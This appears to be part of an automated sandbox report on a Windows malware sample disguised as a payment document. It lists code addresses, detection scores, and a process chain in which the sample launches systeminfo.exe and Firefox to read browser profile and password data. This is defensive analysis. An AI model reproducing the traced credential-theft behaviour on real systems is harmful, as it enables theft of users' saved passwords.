                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018347502_2_01834750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018107702_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182C6E02_2_0182C6E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A02_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018DA9A62_2_018DA9A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018269622_2_01826962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E8F02_2_0183E8F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181A8402_2_0181A840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018128402_2_01812840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F68B82_2_017F68B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C6BD72_2_018C6BD7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CAB402_2_018CAB40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180EA802_2_0180EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01828DBF2_2_01828DBF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180ADE02_2_0180ADE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181AD002_2_0181AD00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018ACD1F2_2_018ACD1F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0CB52_2_018B0CB5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800CF22_2_01800CF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810C002_2_01810C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188EFA02_2_0188EFA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802FC82_2_01802FC8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01852F282_2_01852F28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830F302_2_01830F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B2F302_2_018B2F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01884F402_2_01884F40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01822E902_2_01822E90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CCE932_2_018CCE93
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CEEDB2_2_018CEEDB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CEE262_2_018CEE26
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810E592_2_01810E59
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FF1722_2_017FF172
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181B1B02_2_0181B1B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018DB16B2_2_018DB16B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184516C2_2_0184516C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018170C02_2_018170C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BF0CC2_2_018BF0CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C70E92_2_018C70E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF0E02_2_018CF0E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0185739A2_2_0185739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FD34C2_2_017FD34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C132D2_2_018C132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018152A02_2_018152A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182B2C02_2_0182B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B12ED2_2_018B12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182D2F02_2_0182D2F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AD5B02_2_018AD5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D95C32_2_018D95C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C75712_2_018C7571
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF43F2_2_018CF43F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018014602_2_01801460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CF7B02_2_018CF7B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C16CC2_2_018C16CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018556302_2_01855630
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A59102_2_018A5910
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018199502_2_01819950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182B9502_2_0182B950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018138E02_2_018138E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187D8002_2_0187D800
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182FB802_2_0182FB80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01885BF02_2_01885BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184DBF92_2_0184DBF9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFB762_2_018CFB76
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01855AA02_2_01855AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018ADAAC2_2_018ADAAC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B1AA32_2_018B1AA3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BDAC62_2_018BDAC6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFA492_2_018CFA49
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C7A462_2_018C7A46
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01883A6C2_2_01883A6C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182FDC02_2_0182FDC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01813D402_2_01813D40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C1D5A2_2_018C1D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C7D732_2_018C7D73
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFCF22_2_018CFCF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01889C322_2_01889C32
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01811F922_2_01811F92
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFFB12_2_018CFFB1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CFF092_2_018CFF09
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D3FD52_2_017D3FD5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D3FD22_2_017D3FD2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01819EB02_2_01819EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A24467_2_047A2446
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047944207_2_04794420
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479E4F67_2_0479E4F6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F05357_2_046F0535
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B05917_2_047B0591
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470C6E07_2_0470C6E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F07707_2_046F0770
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047147507_2_04714750
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EC7C07_2_046EC7C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047820007_2_04782000
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047781587_2_04778158
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478A1187_2_0478A118
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E01007_2_046E0100
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A81CC7_2_047A81CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B01AA7_2_047B01AA
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A41A27_2_047A41A2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047902747_2_04790274
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047702C07_2_047702C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AA3527_2_047AA352
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B03E67_2_047B03E6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FE3F07_2_046FE3F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F0C007_2_046F0C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E0CF27_2_046E0CF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04790CB57_2_04790CB5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478CD1F7_2_0478CD1F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FAD007_2_046FAD00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EADE07_2_046EADE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04708DBF7_2_04708DBF
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F0E597_2_046F0E59
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AEE267_2_047AEE26
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AEEDB7_2_047AEEDB
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04702E907_2_04702E90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047ACE937_2_047ACE93
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04764F407_2_04764F40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04710F307_2_04710F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04792F307_2_04792F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04732F287_2_04732F28
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E2FC87_2_046E2FC8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476EFA07_2_0476EFA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F28407_2_046F2840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FA8407_2_046FA840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0471E8F07_2_0471E8F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046D68B87_2_046D68B8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047069627_2_04706962
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F29A07_2_046F29A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047BA9A67_2_047BA9A6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046EEA807_2_046EEA80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AAB407_2_047AAB40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A6BD77_2_047A6BD7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046E14607_2_046E1460
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF43F7_2_047AF43F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A75717_2_047A7571
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B95C37_2_047B95C3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478D5B07_2_0478D5B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047356307_2_04735630
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A16CC7_2_047A16CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF7B07_2_047AF7B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A70E97_2_047A70E9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AF0E07_2_047AF0E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F70C07_2_046F70C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479F0CC7_2_0479F0CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047BB16B7_2_047BB16B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0472516C7_2_0472516C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046DF1727_2_046DF172
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046FB1B07_2_046FB1B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470D2F07_2_0470D2F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047912ED7_2_047912ED
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470B2C07_2_0470B2C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F52A07_2_046F52A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046DD34C7_2_046DD34C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A132D7_2_047A132D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473739A7_2_0473739A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04769C327_2_04769C32
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFCF27_2_047AFCF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A7D737_2_047A7D73
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A1D5A7_2_047A1D5A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F3D407_2_046F3D40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470FDC07_2_0470FDC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F9EB07_2_046F9EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFF097_2_047AFF09
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046B3FD27_2_046B3FD2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046B3FD57_2_046B3FD5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFFB17_2_047AFFB1
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F1F927_2_046F1F92
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475D8007_2_0475D800
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F38E07_2_046F38E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470B9507_2_0470B950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_046F99507_2_046F9950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047859107_2_04785910
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04763A6C7_2_04763A6C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFA497_2_047AFA49
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A7A467_2_047A7A46
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479DAC67_2_0479DAC6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04735AA07_2_04735AA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478DAAC7_2_0478DAAC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04791AA37_2_04791AA3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047AFB767_2_047AFB76
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04765BF07_2_04765BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0472DBF97_2_0472DBF9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0470FB807_2_0470FB80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C1CA07_2_005C1CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCBF77_2_005BCBF7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCC007_2_005BCC00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BCE207_2_005BCE20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005BAEA07_2_005BAEA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C53007_2_005C5300
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C34F97_2_005C34F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C35407_2_005C3540
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005C353B7_2_005C353B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005DB8D07_2_005DB8D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E73C7_2_04A0E73C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E2847_2_04A0E284
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0E3A37_2_04A0E3A3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04A0D8087_2_04A0D808
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0188F290 appears 103 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01857E54 appears 107 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 017FB970 appears 262 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0187EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01845130 appears 58 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04737E54 appears 107 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0475EA12 appears 86 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0476F290 appears 103 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 046DB970 appears 262 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04725130 appears 58 times
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1715237446.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1724504317.000000000AFF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000000.1655164569.000000000027C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.00000000013A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000018FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exeBinary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\systeminfo.exeFile created: C:\Users\user\AppData\Local\Temp\4648H9mUMJump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Payment&WarantyBonds.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2210625422.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2210506095.0000000000A45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment&WarantyBonds.exeReversingLabs: Detection: 45%
                Source: Payment&WarantyBonds.exeVirustotal: Detection: 40%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: gpapi.dllJump to behavior
